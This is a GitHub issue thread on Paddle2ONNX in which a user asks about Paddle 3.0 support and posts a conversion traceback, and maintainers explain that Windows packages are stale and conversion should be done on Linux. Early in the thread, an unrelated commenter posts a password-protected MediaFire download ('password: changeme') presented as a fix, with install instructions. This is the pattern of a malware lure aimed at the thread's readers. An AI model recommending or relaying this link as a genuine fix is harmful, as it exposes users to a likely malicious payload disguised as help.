### ISSUE TITLE
想请问下有预计什么时间支持到paddle3.0吗

### ISSUE THREAD

**Issue by David-dotcom666** [PaddlePaddle/Paddle2ONNX#1370]
**Please fill in the information below so that we can solve the problem quickly, Thanks !**

**Describe the bug**

**Informations (please complete the following information):**
 - Inference engine for deployment:
 - Why convert to onnx：
 - Paddle2ONNX Version:
 - Email/Wechat/Phone:

**Screenshots**

**Additional context**

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zheng-Bicheng** [comment]
3.0目前还是测试版本，等发布正式版本后，会第一时间进行全面测试并跟进。另外，3.0的API应该改动不是特别大，P2O应该是可以直接用的，是遇到什么问题了吗？

**Comment by David-dotcom666** [comment]
@Zheng-Bicheng 我看了下之前paddle3.0训练的rtdert模型转的时候报错,
Traceback (most recent call last):
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\op_mapper\op_mapper.py", line 132, in mapping
    mapper_func(graph, node, **kw)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\op_mapper\tensor.py", line 1174, in opset_1
    graph.build_parameters(parameters)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\graph\onnx_graph.py", line 183, in build_parameters
    vals=weight.flatten().tolist())
  File "d:\pyqt\lib\site-packages\onnx\helper.py", line 698, in make_tensor
    getattr(tensor, field).extend(vals)
TypeError: None has type NoneType, but expected one of: int, float

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "D:\Python37\lib\runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "D:\Python37\lib\runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "D:\PYQT\Scripts\paddle2onnx.exe\__main__.py", line 7, in <module>
  File "d:\pyqt\lib\site-packages\paddle2onnx\command.py", line 267, in main
    auto_update_opset=args.enable_auto_update_opset)
  File "d:\pyqt\lib\site-packages\paddle2onnx\command.py", line 177, in program2onnx
    auto_update_opset)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\command.py", line 210, in program2onnx
    output_names=output_names)
  File "d:\pyqt\lib\site-packages\paddle2onnx\convert.py", line 83, in program2onnx
    operator_export_type, auto_update_opset, **configs)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\convert.py", line 102, in program2onnx
    output_names=output_names)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\convert.py", line 37, in export_onnx
    auto_update_opset)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\graph\onnx_graph.py", line 331, in build
    onnx_graph.build_op_nodes(paddle_graph.node_map)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\graph\onnx_graph.py", line 209, in build_op_nodes
    OpMapper.mapping(self, node, self.operator_export_type)
  File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\op_mapper\op_mapper.py", line 137, in mapping
    node.outputs) + str(e))
Exception: Error happened when mapping node ['assign_value_0'] to onnx, which op_type is 'assign_value' with inputs: {} and outputs: {'Out': ['assign_0.tmp_0']}, specific error: None has type NoneType, but expected one of: int, float

**Comment by Zheng-Bicheng** [comment]
> @Zheng-Bicheng 我看了下之前paddle3.0训练的rtdert模型转的时候报错, Traceback (most recent call last): File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\op_mapper\op_mapper.py", line 132, in mapping mapper_func(graph, node, **kw) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\op_mapper\tensor.py", line 1174, in opset_1 graph.build_parameters(parameters) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\graph\onnx_graph.py", line 183, in build_parameters vals=weight.flatten().tolist()) File "d:\pyqt\lib\site-packages\onnx\helper.py", line 698, in make_tensor getattr(tensor, field).extend(vals) TypeError: None has type NoneType, but expected one of: int, float
> 
> During handling of the above exception, another exception occurred:
> 
> Traceback (most recent call last): File "D:\Python37\lib\runpy.py", line 193, in _run_module_as_main "**main**", mod_spec) File "D:\Python37\lib\runpy.py", line 85, in _run_code exec(code, run_globals) File "D:\PYQT\Scripts\paddle2onnx.exe__main__.py", line 7, in File "d:\pyqt\lib\site-packages\paddle2onnx\command.py", line 267, in main auto_update_opset=args.enable_auto_update_opset) File "d:\pyqt\lib\site-packages\paddle2onnx\command.py", line 177, in program2onnx auto_update_opset) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\command.py", line 210, in program2onnx output_names=output_names) File "d:\pyqt\lib\site-packages\paddle2onnx\convert.py", line 83, in program2onnx operator_export_type, auto_update_opset, **configs) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\convert.py", line 102, in program2onnx output_names=output_names) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\convert.py", line 37, in export_onnx auto_update_opset) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\graph\onnx_graph.py", line 331, in build onnx_graph.build_op_nodes(paddle_graph.node_map) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\graph\onnx_graph.py", line 209, in build_op_nodes OpMapper.mapping(self, node, self.operator_export_type) File "d:\pyqt\lib\site-packages\paddle2onnx\legacy\op_mapper\op_mapper.py", line 137, in mapping node.outputs) + str(e)) Exception: Error happened when mapping node ['assign_value_0'] to onnx, which op_type is 'assign_value' with inputs: {} and outputs: {'Out': ['assign_0.tmp_0']}, specific error: None has type NoneType, but expected one of: int, float

这个是因为你用的 Windows，用Linux来转，Paddle2ONNX很久没发Windows的包了，自动发包机制还没完善。

**Comment by David-dotcom666** [comment]
@Zheng-Bicheng 这样啊,那我有空再试试自己编译看看。
P.S：我都快认为p2onnx也要像fastdeploy还有一些工具包一样没了......看看分派的weekly report感觉又像是有人在维护更新，也看到有讨论发包的问题

**Comment by GreatV** [comment]
@David-dotcom666 paddle2onnx目前是社区在维护。
